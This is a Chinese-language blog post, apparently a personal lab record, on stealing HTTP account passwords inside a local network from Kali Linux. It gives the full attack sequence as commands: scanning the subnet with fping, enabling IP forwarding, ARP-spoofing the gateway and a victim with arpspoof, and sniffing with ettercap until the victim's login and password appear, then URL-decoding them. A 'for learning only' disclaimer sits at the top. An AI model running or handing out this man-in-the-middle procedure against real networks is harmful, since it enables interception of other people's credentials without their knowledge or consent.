kali 內網HTTP賬號密碼獲取記錄
註:本教程只用於學習使用,切勿拿去搞破壞,一切法律後果與本人無關
1.原理:
在區域網環境中,通過ARP欺騙,將目標主機的網路包都流經攻擊者,然後再通過嗅探的方式從而獲取到HTTP的一些數據信息。下面主要是利用ettercap來進行嗅探
(大部分的大型網站都無法進行嗅探獲取密碼。試驗失敗了,這裡做實驗記錄)
2. 區域網IP掃描:
命令:
fping -asg 192.168.43.0/24
ctrl+c停止掃描
3. 工具使用:arpspoof、ettercap
命令:
arpspoof -i +網卡 -t +網關 +目標IP
ettercap -Tq -i +網卡
-T參數即--text,啟動文本模式;-q參數即--quiet,不顯示包的內容
ettercap是在linux下運行的 。其實功能都是差不多的,我稱呼它為嗅探工具,ARP欺騙,DNS,劫持,中間人攻擊等等。總之這是一款強大的安全測試工具。
4. 實踐記錄:
4.1查看自己的IP和網關:ifconfig、route -n
4.2掃描其他人的IP:fping 192.168.43.0/24
4.3進行IP流量轉發:
echo 1 > /proc//sys/net/ipv4/ip_forward
4.4進行ARP欺騙
命令:arpspoof -i eth0 -t 192.168.43.1 192.168.43.38
4.5再開一個終端,開始嗅探
輸入:ettercap -Tq -i eth0
4.6當受害者登陸後,即可嗅探到賬戶和密碼
當登錄名稱的字元是中文時,在嗅探到的內容中Content中的內容不是中文而是其URL形式的編碼:
對於這種編碼直接URL解碼即可,最簡單的方法是去URL解碼的網站進行解碼:
end
掃碼即可關注~
ID和我一起學習記錄
TAG:程帥帥 |